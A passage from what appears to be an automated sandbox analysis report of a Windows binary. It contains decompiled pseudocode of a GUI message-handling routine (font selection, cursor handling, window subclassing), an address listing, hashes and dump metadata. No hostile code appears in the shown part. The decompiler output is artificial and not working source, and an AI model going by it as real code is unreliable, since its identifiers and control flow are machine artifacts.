				intOrPtr _t632;
				intOrPtr _t633;
				intOrPtr _t634;
				intOrPtr _t638;
				intOrPtr _t639;
				struct HWND__* _t640;
				signed char _t647;
				intOrPtr _t682;
				signed int _t683;
				signed int _t685;
				intOrPtr _t686;
				intOrPtr _t695;
				intOrPtr _t699;
				intOrPtr _t707;
				intOrPtr _t711;
				intOrPtr _t727;
				signed int _t744;
				signed int _t749;
				intOrPtr _t762;
				signed int _t767;
				signed int _t772;
				void* _t783;
				void* _t784;
				signed int _t789;
				intOrPtr _t791;
				signed int _t792;
				signed int _t793;
				signed int _t795;
				signed int _t799;
				void* _t800;
				intOrPtr _t806;
				void* _t815;
				void* _t816;
				intOrPtr _t817;
				void* _t818;
				void* _t819;

				_t815 = _t816;
				_t817 = _t816 + 0xffffff68;
				_push(__ebx);
				_v148 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t815);
				_push(0x470174);
				_push( *[fs:eax]);
				 *[fs:eax] = _t817;
				_t339 =  *((intOrPtr*)(_v12 + 8));
				_t682 =  *((intOrPtr*)(_t339 + 8));
				_t818 = _t682 - 0xfffffe6b;
				if(_t818 > 0) {
					__eflags = _t682 - 0xfffffe6f;
					if(__eflags > 0) {
						_t683 = _t682 - 0xfffffff4;
						__eflags = _t683;
						if(_t683 == 0) {
							_t685 =  *(_v8 + 0x20c);
							__eflags = _t685;
							if(_t685 == 0) {
								goto L114;
							} else {
								_t615 = _t339;
								E00420398(_t685);
								_push(_t815);
								_push(0x46fd62);
								_push( *[fs:edx]);
								 *[fs:edx] = _t817;
								 *(_v12 + 0xc) = 0;
								__eflags =  *(_t615 + 0xe) & 0x00000001;
								if(( *(_t615 + 0xe) & 0x00000001) != 0) {
									E00402EF0( &_v82, 0x28);
									_v78 =  *((intOrPtr*)(_t615 + 0x24));
									_t789 = E0046F724(_v8,  &_v82);
									__eflags = _t789;
									if(_t789 != 0) {
										_t352 =  *(_t615 + 0xc) - 0x10001;
										__eflags = _t352;
										if(_t352 == 0) {
											__eflags =  *(_t615 + 0xc) & 0x00010002;
											if(( *(_t615 + 0xc) & 0x00010002) != 0) {
												_t416 = _v8;
												_t707 = _v8;
												__eflags =  *((intOrPtr*)(_t416 + 0x288)) +  *((intOrPtr*)(_t707 + 0x28c));
												if( *((intOrPtr*)(_t416 + 0x288)) +  *((intOrPtr*)(_t707 + 0x28c)) != 0) {
													SelectObject( *(_t615 + 0x10),  *(_v8 + 0x28c));
													DeleteObject( *(_v8 + 0x288));
													 *(_v8 + 0x288) = 0;
													__eflags = 0;
													 *(_v8 + 0x28c) = 0;
												}
											}
											_push(_t815);
											_push(0x46fcbd);
											_push( *[fs:edx]);
											 *[fs:edx] = _t817;
											E004207B0( *(_v8 + 0x20c),  *(_t615 + 0x10));
											E0042062C( *(_v8 + 0x20c));
											E00420648( *(_v8 + 0x20c));
											__eflags =  *(_t615 + 0x28) & 0x00000001;
											if(( *(_t615 + 0x28) & 0x00000001) != 0) {
												E0041F464( *((intOrPtr*)( *(_v8 + 0x20c) + 0xc)), 0x8000000e);
												E0041FC50( *((intOrPtr*)( *(_v8 + 0x20c) + 0x14)), 0, 0x8000000d, _t789, _t815, __eflags);
											}
											_t365 =  *(_v8 + 0x20c);
											_t695 =  *((intOrPtr*)(_t365 + 0xc));
											 *((intOrPtr*)(_t695 + 0xc)) = _v8;
											 *((intOrPtr*)(_t695 + 8)) = 0x470afc;
											_t366 =  *((intOrPtr*)(_t365 + 0x14));
											 *((intOrPtr*)(_t366 + 0xc)) = _v8;
											 *((intOrPtr*)(_t366 + 8)) = 0x470afc;
											 *((char*)(_v8 + 0x210)) = 0;
											_t647 =  *(_t615 + 0x28);
											_v21 =  *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 0);
											__eflags = _v22;
											if(_v22 == 0) {
												_t407 = _v12;
												_t131 = _t407 + 0xc;
												 *_t131 =  *(_t407 + 0xc) | 0x00010000;
												__eflags =  *_t131;
											}
											__eflags = _v21;
											if(_v21 != 0) {
												_t371 = _v8;
												__eflags =  *((char*)(_t371 + 0x210));
												if( *((char*)(_t371 + 0x210)) != 0) {
													 *((char*)(_v8 + 0x210)) = 0;
													_t799 =  *(_v8 + 0x20c);
													_t381 =  *((intOrPtr*)(_t799 + 0xc));
													 *((intOrPtr*)(_t381 + 8)) = 0;
													 *((intOrPtr*)(_t381 + 0xc)) = 0;
													_t382 =  *((intOrPtr*)(_t799 + 0x14));
													 *((intOrPtr*)(_t382 + 8)) = 0;
													 *((intOrPtr*)(_t382 + 0xc)) = 0;
													_t150 = _v12 + 8; // 0x5875c984
													_t791 =  *_t150;
													 *((intOrPtr*)(_t791 + 0x30)) = E0041EFA4( *((intOrPtr*)( *((intOrPtr*)(_t799 + 0xc)) + 0x18)));
													 *((intOrPtr*)(_t791 + 0x34)) = E0041EFA4(E0041FC48( *((intOrPtr*)( *(_v8 + 0x20c) + 0x14))));
													_t396 = GetObjectA(E0041F478( *((intOrPtr*)( *(_v8 + 0x20c) + 0xc)), _t615, _t647), 0x3c,  &_v142);
													__eflags = _t396;
													if(_t396 != 0) {
														E004207B0( *(_v8 + 0x20c), 0);
														_t800 = CreateFontIndirectA( &_v142);
														 *(_v8 + 0x288) = _t800;
														 *(_v8 + 0x28c) = SelectObject( *(_t615 + 0x10), _t800);
														_t405 = _v12;
														_t171 = _t405 + 0xc;
														 *_t171 =  *(_t405 + 0xc) | 0x00000002;
														__eflags =  *_t171;
													}
												}
											} else {
												 *(_v12 + 0xc) =  *(_v12 + 0xc) | 0x00000004;
											}
											_t373 =  *((intOrPtr*)( *_v8 + 0xdc))();
											__eflags = _t373;
											if(_t373 != 0) {
												_t378 = _v12;
												_t176 = _t378 + 0xc;
												 *_t176 =  *(_t378 + 0xc) | 0x00000010;
												__eflags =  *_t176;
											}
											_pop(_t699);
											 *[fs:eax] = _t699;
											_push(0x46fd46);
											__eflags = 0;
											return E004207B0( *(_v8 + 0x20c), 0);
										} else {
											_t428 = _t352 - 1;
											__eflags = _t428;
											if(_t428 == 0) {
												_t430 =  *((intOrPtr*)( *_v8 + 0xdc))();
												__eflags = _t430;
												if(_t430 != 0) {
													 *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 1);
												}
											} else {
												_t438 = _t428 - 1;
												__eflags = _t438;
												if(_t438 == 0) {
													_t440 =  *((intOrPtr*)( *_v8 + 0xdc))();
													__eflags = _t440;
													if(_t440 != 0) {
														 *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 2);
													}
												} else {
													__eflags = _t438 == 1;
													if(_t438 == 1) {
														_t446 =  *((intOrPtr*)( *_v8 + 0xdc))();
														__eflags = _t446;
														if(_t446 != 0) {
															 *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 3);
														}
													}
												}
											}
											goto L71;
										}
									} else {
										E00403E54();
										goto L114;
									}
								} else {
									 *((intOrPtr*)( *_v8 + 0x44))();
									_t454 =  *(_t615 + 0xc) - 1;
									__eflags = _t454;
									if(_t454 == 0) {
										_t456 =  *((intOrPtr*)( *_v8 + 0xdc))();
										__eflags = _t456;
										if(_t456 == 0) {
											_t458 =  *((intOrPtr*)( *_v8 + 0xdc))();
											__eflags = _t458;
											if(_t458 != 0) {
												L32:
												_t459 = _v12;
												_t43 = _t459 + 0xc;
												 *_t43 =  *(_t459 + 0xc) | 0x00000020;
												__eflags =  *_t43;
											} else {
												_t467 =  *((intOrPtr*)( *_v8 + 0xdc))();
												__eflags = _t467;
												if(_t467 != 0) {
													goto L32;
												}
											}
											_t461 =  *((intOrPtr*)( *_v8 + 0xdc))();
											__eflags = _t461;
											if(_t461 != 0) {
												_t465 = _v12;
												_t48 = _t465 + 0xc;
												 *_t48 =  *(_t465 + 0xc) | 0x00000010;
												__eflags =  *_t48;
											}
											_t463 =  *((intOrPtr*)( *_v8 + 0xdc))();
											__eflags = _t463;
											if(_t463 != 0) {
												 *(_v12 + 0xc) =  *(_v12 + 0xc) | 0x00000040;
											}
											goto L71;
										} else {
											 *[fs:eax] = _t817;
											E004207B0( *(_v8 + 0x20c),  *(_t615 + 0x10));
											E0042062C( *(_v8 + 0x20c));
											E00420648( *(_v8 + 0x20c));
											_v21 =  *((intOrPtr*)( *_v8 + 0xcc))( *[fs:eax], 0x46f915, _t815);
											_pop(_t727);
											 *[fs:eax] = _t727;
											_push(0x46f91c);
											__eflags = 0;
											return E004207B0( *(_v8 + 0x20c), 0);
										}
									} else {
										_t486 = _t454 - 1;
										__eflags = _t486;
										if(_t486 == 0) {
											_t488 =  *((intOrPtr*)( *_v8 + 0xdc))();
											__eflags = _t488;
											if(_t488 != 0) {
												 *((intOrPtr*)( *_v8 + 0xcc))();
											}
										} else {
											_t491 = _t486 - 1;
											__eflags = _t491;
											if(_t491 == 0) {
												_t493 =  *((intOrPtr*)( *_v8 + 0xdc))();
												__eflags = _t493;
												if(_t493 != 0) {
													 *((intOrPtr*)( *_v8 + 0xcc))();
												}
											} else {
												__eflags = _t491 == 1;
												if(_t491 == 1) {
													_t498 =  *((intOrPtr*)( *_v8 + 0xdc))();
													__eflags = _t498;
													if(_t498 != 0) {
														 *((intOrPtr*)( *_v8 + 0xcc))();
													}
												}
											}
										}
										L71:
										__eflags = 0;
										_pop(_t711);
										 *[fs:eax] = _t711;
										_push(0x47015b);
										return E00420604( *(_v8 + 0x20c));
									}
								}
							}
						} else {
							__eflags = _t683 == 7;
							if(_t683 == 7) {
								 *((intOrPtr*)(_v8 + 0x240)) = 0;
								GetCursorPos( &_v20);
								_t504 = _v8;
								__eflags =  *((char*)(_t504 + 0x244));
								if( *((char*)(_t504 + 0x244)) == 0) {
									_t506 = E00407328( &_v20, 0);
									_t508 = E0043CC2C(_v8);
									PostMessageA(E0043CC2C(_v8), 0xbc7b, _t508, _t506);
								} else {
									E004360F0(_v8,  &_v156,  &_v20);
									_v26 = E00407328( &_v156,  &_v156);
									 *((intOrPtr*)(_v8 + 0x240)) = E0046F45C(_v8, _v24, _v26);
									_t520 = E00407328( &_v20, _v24);
									E00437760(_v8, E0043CC2C(_v8), 0x7b, _t520);
									 *((intOrPtr*)(_v8 + 0x240)) = 0;
								}
								 *(_v12 + 0xc) = 1;
							}
							goto L114;
						}
					} else {
						if(__eflags == 0) {
							goto L91;
						} else {
							_t744 = _t682 - 0xfffffe6c;
							__eflags = _t744;
							if(_t744 == 0) {
								_t631 = _t339;
								_t792 = E0046F724(_v8, _t631 + 0xc);
								__eflags = _t792;
								if(_t792 != 0) {
									__eflags =  *(_t631 + 0xc) & 0x00000001;
									if(( *(_t631 + 0xc) & 0x00000001) != 0) {
										E00404538( &_v148,  *((intOrPtr*)(_t631 + 0x1c)));
										E0046CFA4(_t792, _v148);
									}
								}
							} else {
								_t749 = _t744 - 1;
								__eflags = _t749;
								if(_t749 == 0) {
									_t632 = _t339;
									_t793 = E0046F724(_v8, _t632 + 0xc);
									__eflags = _t793;
									if(_t793 != 0) {
										__eflags =  *(_t632 + 0xc) & 0x00000001;
										if(( *(_t632 + 0xc) & 0x00000001) != 0) {
											_t548 = E004047F8( *((intOrPtr*)(_t793 + 8)));
											__eflags =  *((intOrPtr*)(_t632 + 0x20)) - 1;
											E00408C5C( *((intOrPtr*)(_t632 + 0x1c)),  *((intOrPtr*)(_t632 + 0x20)) - 1, _t548);
										}
										__eflags =  *(_t632 + 0xc) & 0x00000002;
										if(( *(_t632 + 0xc) & 0x00000002) != 0) {
											 *((intOrPtr*)( *_v8 + 0xd4))();
											 *((intOrPtr*)(_t632 + 0x24)) =  *((intOrPtr*)(_t793 + 0x14));
										}
										__eflags =  *(_t632 + 0xc) & 0x00000020;
										if(( *(_t632 + 0xc) & 0x00000020) != 0) {
											 *((intOrPtr*)( *_v8 + 0xd8))();
											 *((intOrPtr*)(_t632 + 0x28)) =  *((intOrPtr*)(_t793 + 0x18));
										}
									}
								} else {
									__eflags = _t749 == 1;
									if(_t749 == 1) {
										goto L93;
									} else {
									}
								}
							}
						}
						goto L114;
					}
				} else {
					if(_t818 == 0) {
						_t762 = _v8;
						__eflags =  *((char*)(_t762 + 0x245));
						if( *((char*)(_t762 + 0x245)) == 0) {
							_t634 = _t339;
							E0046F724(_v8, _t634 + 0x38);
							__eflags =  *((intOrPtr*)(_t634 + 0xc)) - 2;
							if(__eflags != 0) {
								L83:
								__eflags =  *((intOrPtr*)(_t634 + 0xc)) - 1;
								if(__eflags == 0) {
									_t566 = E004037D8(_v8, __eflags);
									__eflags = _t566;
									if(_t566 == 0) {
										 *(_v12 + 0xc) = 1;
									}
								}
							} else {
								_t569 = E004037D8(_v8, __eflags);
								__eflags = _t569;
								if(_t569 != 0) {
									goto L83;
								} else {
									 *(_v12 + 0xc) = 1;
								}
							}
						}
					} else {
						_t819 = _t682 - 0xfffffe66;
						if(_t819 > 0) {
							_t767 = _t682 - 0xfffffe67;
							__eflags = _t767;
							if(_t767 == 0) {
								_t795 = E0046F724(_v8, _t339 + 0x10);
								__eflags = _t795;
								if(_t795 != 0) {
									 *((intOrPtr*)(_t795 + 0x10)) = 0;
									E0042EA04( *((intOrPtr*)(_v8 + 0x330)), 0);
									_t577 = _v8;
									__eflags =  *((char*)(_t577 + 0x25c));
									if( *((char*)(_t577 + 0x25c)) == 0) {
										E0046E1D8(_t795);
									} else {
										E0046DEB8(_t795);
									}
								}
							} else {
								_t772 = _t767 - 2;
								__eflags = _t772;
								if(_t772 == 0) {
									 *((char*)(_v8 + 0x218)) = 1;
									 *((intOrPtr*)(_v8 + 0x220)) = E0046F724(_v8,  *((intOrPtr*)(_v12 + 8)) + 0x38);
								} else {
									__eflags = _t772 == 1;
									if(_t772 == 1) {
										_t586 = _v8;
										__eflags =  *((char*)(_t586 + 0x245));
										if( *((char*)(_t586 + 0x245)) == 0) {
											_t638 =  *((intOrPtr*)(_v12 + 8));
											E0046F724(_v8, _t638 + 0x38);
											_t589 =  *((intOrPtr*)(_t638 + 0xc));
											__eflags = _t589 - 2;
											if(__eflags != 0) {
												__eflags = _t589 - 1;
												if(__eflags == 0) {
													E004037D8(_v8, __eflags);
												}
											} else {
												E004037D8(_v8, __eflags);
											}
										}
									}
								}
							}
						} else {
							if(_t819 == 0) {
								_t639 = _t339;
								_t595 = E00436D1C(_v8);
								__eflags = _t595;
								if(_t595 != 0) {
									L75:
									 *(_v12 + 0xc) = 1;
								} else {
									E0046F724(_v8, _t639 + 0xc);
									_t611 = E004037D8(_v8, __eflags);
									__eflags = _t611;
									if(_t611 == 0) {
										goto L75;
									}
								}
								_t597 = _v12;
								__eflags =  *(_t597 + 0xc);
								if( *(_t597 + 0xc) == 0) {
									_t640 = E00427150(E0043CC2C(_v8));
									 *(_v8 + 0x224) = _t640;
									 *((intOrPtr*)(_v8 + 0x214)) = GetWindowLongA(_t640, 0xfffffffc);
									SetWindowLongA( *(_v8 + 0x224), 0xfffffffc,  *(_v8 + 0x228));
								}
							} else {
								_t783 = _t682 - 0xfffffe3d;
								if(_t783 == 0) {
									L93:
									_t806 = _t339;
									_t552 =  *((intOrPtr*)(_v8 + 0x330));
									__eflags =  *(_t552 + 0x30);
									if( *(_t552 + 0x30) <= 0) {
										E0046F724(_v8, _t806 + 0x38);
										E004037D8(_v8, __eflags);
									} else {
										_t633 = _t552;
										E0042EA04(_t633, 0);
										 *((intOrPtr*)(_t633 + 0xc)) = E0046F724(_v8, _t806 + 0x38);
										E0042EA04(_t633, 1);
									}
								} else {
									_t784 = _t783 - 1;
									if(_t784 == 0) {
										L91:
										E0046F724(_v8,  *((intOrPtr*)(_v12 + 8)) + 0x38);
										_t531 = E004037D8(_v8, __eflags);
										__eflags = _t531;
										if(_t531 == 0) {
											 *(_v12 + 0xc) = 1;
										}
									} else {
										if(_t784 == 0x27) {
											E004037D8(_v8, __eflags);
										}
									}
								}
							}
						}
					}
					L114:
					_pop(_t686);
					 *[fs:eax] = _t686;
					_push(0x47017b);
					return E00404348( &_v148);
				}
			}




































































































                                                                        0x0046f74d
                                                                        0x0046f74f
                                                                        0x0046f755
                                                                        0x0046f75a
                                                                        0x0046f760
                                                                        0x0046f763
                                                                        0x0046f768
                                                                        0x0046f769
                                                                        0x0046f76e
                                                                        0x0046f771
                                                                        0x0046f777
                                                                        0x0046f77a
                                                                        0x0046f77d
                                                                        0x0046f783
                                                                        0x0046f7db
                                                                        0x0046f7e1
                                                                        0x0046f808
                                                                        0x0046f808
                                                                        0x0046f80b
                                                                        0x0046f81e
                                                                        0x0046f824
                                                                        0x0046f826
                                                                        0x00000000
                                                                        0x0046f82c
                                                                        0x0046f82f
                                                                        0x0046f833
                                                                        0x0046f83a
                                                                        0x0046f83b
                                                                        0x0046f840
                                                                        0x0046f843
                                                                        0x0046f84b
                                                                        0x0046f84e
                                                                        0x0046f852
                                                                        0x0046fa2e
                                                                        0x0046fa36
                                                                        0x0046fa44
                                                                        0x0046fa46
                                                                        0x0046fa48
                                                                        0x0046fa57
                                                                        0x0046fa57
                                                                        0x0046fa5c
                                                                        0x0046fa78
                                                                        0x0046fa7f
                                                                        0x0046fa81
                                                                        0x0046fa8a
                                                                        0x0046fa93
                                                                        0x0046fa95
                                                                        0x0046faa5
                                                                        0x0046fab4
                                                                        0x0046fabe
                                                                        0x0046fac7
                                                                        0x0046fac9
                                                                        0x0046fac9
                                                                        0x0046fa95
                                                                        0x0046fad1
                                                                        0x0046fad2
                                                                        0x0046fad7
                                                                        0x0046fada
                                                                        0x0046fae9
                                                                        0x0046fafd
                                                                        0x0046fb14
                                                                        0x0046fb19
                                                                        0x0046fb1d
                                                                        0x0046fb30
                                                                        0x0046fb46
                                                                        0x0046fb46
                                                                        0x0046fb4e
                                                                        0x0046fb54
                                                                        0x0046fb5a
                                                                        0x0046fb5d
                                                                        0x0046fb64
                                                                        0x0046fb6a
                                                                        0x0046fb6d
                                                                        0x0046fb77
                                                                        0x0046fb84
                                                                        0x0046fb95
                                                                        0x0046fb98
                                                                        0x0046fb9c
                                                                        0x0046fb9e
                                                                        0x0046fba1
                                                                        0x0046fba1
                                                                        0x0046fba1
                                                                        0x0046fba1
                                                                        0x0046fba8
                                                                        0x0046fbac
                                                                        0x0046fbba
                                                                        0x0046fbbd
                                                                        0x0046fbc4
                                                                        0x0046fbcd
                                                                        0x0046fbd7
                                                                        0x0046fbdd
                                                                        0x0046fbe2
                                                                        0x0046fbe5
                                                                        0x0046fbe8
                                                                        0x0046fbed
                                                                        0x0046fbf0
                                                                        0x0046fbf6
                                                                        0x0046fbf6
                                                                        0x0046fc04
                                                                        0x0046fc1d
                                                                        0x0046fc3b
                                                                        0x0046fc40
                                                                        0x0046fc42
                                                                        0x0046fc4f
                                                                        0x0046fc60
                                                                        0x0046fc65
                                                                        0x0046fc78
                                                                        0x0046fc7e
                                                                        0x0046fc81
                                                                        0x0046fc81
                                                                        0x0046fc81
                                                                        0x0046fc81
                                                                        0x0046fc42
                                                                        0x0046fbae
                                                                        0x0046fbb1
                                                                        0x0046fbb1
                                                                        0x0046fc8e
                                                                        0x0046fc94
                                                                        0x0046fc96
                                                                        0x0046fc98
                                                                        0x0046fc9b
                                                                        0x0046fc9b
                                                                        0x0046fc9b
                                                                        0x0046fc9b
                                                                        0x0046fca1
                                                                        0x0046fca4
                                                                        0x0046fca7
                                                                        0x0046fcb5
                                                                        0x0046fcbc
                                                                        0x0046fa5e
                                                                        0x0046fa5e
                                                                        0x0046fa5e
                                                                        0x0046fa5f
                                                                        0x0046fccd
                                                                        0x0046fcd3
                                                                        0x0046fcd5
                                                                        0x0046fce8
                                                                        0x0046fce8
                                                                        0x0046fa65
                                                                        0x0046fa65
                                                                        0x0046fa65
                                                                        0x0046fa66
                                                                        0x0046fcf9
                                                                        0x0046fcff
                                                                        0x0046fd01
                                                                        0x0046fd14
                                                                        0x0046fd14
                                                                        0x0046fa6c
                                                                        0x0046fa6c
                                                                        0x0046fa6d
                                                                        0x0046fd25
                                                                        0x0046fd2b
                                                                        0x0046fd2d
                                                                        0x0046fd40
                                                                        0x0046fd40
                                                                        0x0046fd2d
                                                                        0x0046fa6d
                                                                        0x0046fa66
                                                                        0x00000000
                                                                        0x0046fa5f
                                                                        0x0046fa4a
                                                                        0x0046fa4a
                                                                        0x00000000
                                                                        0x0046fa4a
                                                                        0x0046f858
                                                                        0x0046f860
                                                                        0x0046f866
                                                                        0x0046f866
                                                                        0x0046f867
                                                                        0x0046f88c
                                                                        0x0046f892
                                                                        0x0046f894
                                                                        0x0046f93f
                                                                        0x0046f945
                                                                        0x0046f947
                                                                        0x0046f95c
                                                                        0x0046f95c
                                                                        0x0046f95f
                                                                        0x0046f95f
                                                                        0x0046f95f
                                                                        0x0046f949
                                                                        0x0046f952
                                                                        0x0046f958
                                                                        0x0046f95a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046f95a
                                                                        0x0046f96c
                                                                        0x0046f972
                                                                        0x0046f974
                                                                        0x0046f976
                                                                        0x0046f979
                                                                        0x0046f979
                                                                        0x0046f979
                                                                        0x0046f979
                                                                        0x0046f986
                                                                        0x0046f98c
                                                                        0x0046f98e
                                                                        0x0046f997
                                                                        0x0046f997
                                                                        0x00000000
                                                                        0x0046f89a
                                                                        0x0046f8a5
                                                                        0x0046f8b4
                                                                        0x0046f8c8
                                                                        0x0046f8df
                                                                        0x0046f8f4
                                                                        0x0046f8f9
                                                                        0x0046f8fc
                                                                        0x0046f8ff
                                                                        0x0046f90d
                                                                        0x0046f914
                                                                        0x0046f914
                                                                        0x0046f869
                                                                        0x0046f869
                                                                        0x0046f869
                                                                        0x0046f86a
                                                                        0x0046f9a9
                                                                        0x0046f9af
                                                                        0x0046f9b1
                                                                        0x0046f9c1
                                                                        0x0046f9c1
                                                                        0x0046f870
                                                                        0x0046f870
                                                                        0x0046f870
                                                                        0x0046f871
                                                                        0x0046f9d5
                                                                        0x0046f9db
                                                                        0x0046f9dd
                                                                        0x0046f9ed
                                                                        0x0046f9ed
                                                                        0x0046f877
                                                                        0x0046f877
                                                                        0x0046f878
                                                                        0x0046fa01
                                                                        0x0046fa07
                                                                        0x0046fa09
                                                                        0x0046fa19
                                                                        0x0046fa19
                                                                        0x0046fa09
                                                                        0x0046f878
                                                                        0x0046f871
                                                                        0x0046fd46
                                                                        0x0046fd46
                                                                        0x0046fd48
                                                                        0x0046fd4b
                                                                        0x0046fd4e
                                                                        0x0046fd61
                                                                        0x0046fd61
                                                                        0x0046f867
                                                                        0x0046f852
                                                                        0x0046f80d
                                                                        0x0046f80d
                                                                        0x0046f810
                                                                        0x004700ac
                                                                        0x004700b6
                                                                        0x004700bb
                                                                        0x004700be
                                                                        0x004700c5
                                                                        0x0047012f
                                                                        0x00470138
                                                                        0x0047014c
                                                                        0x004700c7
                                                                        0x004700d3
                                                                        0x004700e3
                                                                        0x004700f9
                                                                        0x00470102
                                                                        0x0047011a
                                                                        0x00470124
                                                                        0x00470124
                                                                        0x00470154
                                                                        0x00470154
                                                                        0x00000000
                                                                        0x0046f810
                                                                        0x0046f7e3
                                                                        0x0046f7e3
                                                                        0x00000000
                                                                        0x0046f7e9
                                                                        0x0046f7e9
                                                                        0x0046f7e9
                                                                        0x0046f7ef
                                                                        0x0046fff5
                                                                        0x00470002
                                                                        0x00470004
                                                                        0x00470006
                                                                        0x0047000c
                                                                        0x00470010
                                                                        0x0047001f
                                                                        0x0047002c
                                                                        0x0047002c
                                                                        0x00470010
                                                                        0x0046f7f5
                                                                        0x0046f7f5
                                                                        0x0046f7f5
                                                                        0x0046f7f6
                                                                        0x00470039
                                                                        0x00470046
                                                                        0x00470048
                                                                        0x0047004a
                                                                        0x00470050
                                                                        0x00470054
                                                                        0x00470059
                                                                        0x00470063
                                                                        0x00470067
                                                                        0x00470067
                                                                        0x0047006c
                                                                        0x00470070
                                                                        0x00470079
                                                                        0x00470082
                                                                        0x00470082
                                                                        0x00470085
                                                                        0x00470089
                                                                        0x00470096
                                                                        0x0047009f
                                                                        0x0047009f
                                                                        0x00470089
                                                                        0x0046f7fc
                                                                        0x0046f7fc
                                                                        0x0046f7fd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046f803
                                                                        0x0046f7fd
                                                                        0x0046f7f6
                                                                        0x0046f7ef
                                                                        0x00000000
                                                                        0x0046f7e3
                                                                        0x0046f785
                                                                        0x0046f785
                                                                        0x0046fe37
                                                                        0x0046fe3a
                                                                        0x0046fe41
                                                                        0x0046fe4a
                                                                        0x0046fe52
                                                                        0x0046fe59
                                                                        0x0046fe5d
                                                                        0x0046fe80
                                                                        0x0046fe80
                                                                        0x0046fe84
                                                                        0x0046fe93
                                                                        0x0046fe98
                                                                        0x0046fe9a
                                                                        0x0046fea3
                                                                        0x0046fea3
                                                                        0x0046fe9a
                                                                        0x0046fe5f
                                                                        0x0046fe68
                                                                        0x0046fe6d
                                                                        0x0046fe6f
                                                                        0x00000000
                                                                        0x0046fe71
                                                                        0x0046fe74
                                                                        0x0046fe74
                                                                        0x0046fe6f
                                                                        0x0046fe5d
                                                                        0x0046f78b
                                                                        0x0046f78b
                                                                        0x0046f791
                                                                        0x0046f7ba
                                                                        0x0046f7ba
                                                                        0x0046f7c0
                                                                        0x0046ffa6
                                                                        0x0046ffa8
                                                                        0x0046ffaa
                                                                        0x0046ffb2
                                                                        0x0046ffc0
                                                                        0x0046ffc5
                                                                        0x0046ffc8
                                                                        0x0046ffcf
                                                                        0x0046ffe8
                                                                        0x0046ffd1
                                                                        0x0046ffd3
                                                                        0x0046ffd3
                                                                        0x0046ffcf
                                                                        0x0046f7c6
                                                                        0x0046f7c6
                                                                        0x0046f7c6
                                                                        0x0046f7c9
                                                                        0x0046fd6c
                                                                        0x0046fd87
                                                                        0x0046f7cf
                                                                        0x0046f7cf
                                                                        0x0046f7d0
                                                                        0x0046feaf
                                                                        0x0046feb2
                                                                        0x0046feb9
                                                                        0x0046fec2
                                                                        0x0046fecb
                                                                        0x0046fed2
                                                                        0x0046fed5
                                                                        0x0046fed8
                                                                        0x0046feed
                                                                        0x0046fef0
                                                                        0x0046feff
                                                                        0x0046feff
                                                                        0x0046feda
                                                                        0x0046fee3
                                                                        0x0046fee3
                                                                        0x0046fed8
                                                                        0x0046feb9
                                                                        0x0046f7d0
                                                                        0x0046f7c9
                                                                        0x0046f793
                                                                        0x0046f793
                                                                        0x0046fd95
                                                                        0x0046fd9a
                                                                        0x0046fd9f
                                                                        0x0046fda1
                                                                        0x0046fdc0
                                                                        0x0046fdc3
                                                                        0x0046fda3
                                                                        0x0046fda9
                                                                        0x0046fdb7
                                                                        0x0046fdbc
                                                                        0x0046fdbe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046fdbe
                                                                        0x0046fdca
                                                                        0x0046fdcd
                                                                        0x0046fdd1
                                                                        0x0046fde4
                                                                        0x0046fde9
                                                                        0x0046fdfa
                                                                        0x0046fe16
                                                                        0x0046fe16
                                                                        0x0046f799
                                                                        0x0046f799
                                                                        0x0046f79f
                                                                        0x0046ff3f
                                                                        0x0046ff42
                                                                        0x0046ff47
                                                                        0x0046ff4d
                                                                        0x0046ff51
                                                                        0x0046ff80
                                                                        0x0046ff8e
                                                                        0x0046ff53
                                                                        0x0046ff53
                                                                        0x0046ff59
                                                                        0x0046ff69
                                                                        0x0046ff70
                                                                        0x0046ff70
                                                                        0x0046f7a5
                                                                        0x0046f7a5
                                                                        0x0046f7a6
                                                                        0x0046ff09
                                                                        0x0046ff15
                                                                        0x0046ff23
                                                                        0x0046ff28
                                                                        0x0046ff2a
                                                                        0x0046ff33
                                                                        0x0046ff33
                                                                        0x0046f7ac
                                                                        0x0046f7af
                                                                        0x0046fe2d
                                                                        0x0046fe2d
                                                                        0x0046f7af
                                                                        0x0046f7a6
                                                                        0x0046f79f
                                                                        0x0046f793
                                                                        0x0046f791
                                                                        0x0047015b
                                                                        0x0047015d
                                                                        0x00470160
                                                                        0x00470163
                                                                        0x00470173
                                                                        0x00470173

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: LongWindow
                                                                        • String ID:
                                                                        • API String ID: 1378638983-3916222277
                                                                        • Opcode ID: d4a2872a6cfd99d343174a523ec3493d2adaa694f171adf8ea982967d72df4ec
                                                                        • Instruction ID: bc881593e282ff87a3e970e118c00ca0bda6ee8fb0a22e84ef7b770fe6afd480
                                                                        • Opcode Fuzzy Hash: d4a2872a6cfd99d343174a523ec3493d2adaa694f171adf8ea982967d72df4ec
                                                                        • Instruction Fuzzy Hash: 96623734A00204DFCB00DFA9D5C8A9EB7F1FF48314F6481A6E849AB366D738AE45DB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043CF3C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E0043CF3C(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
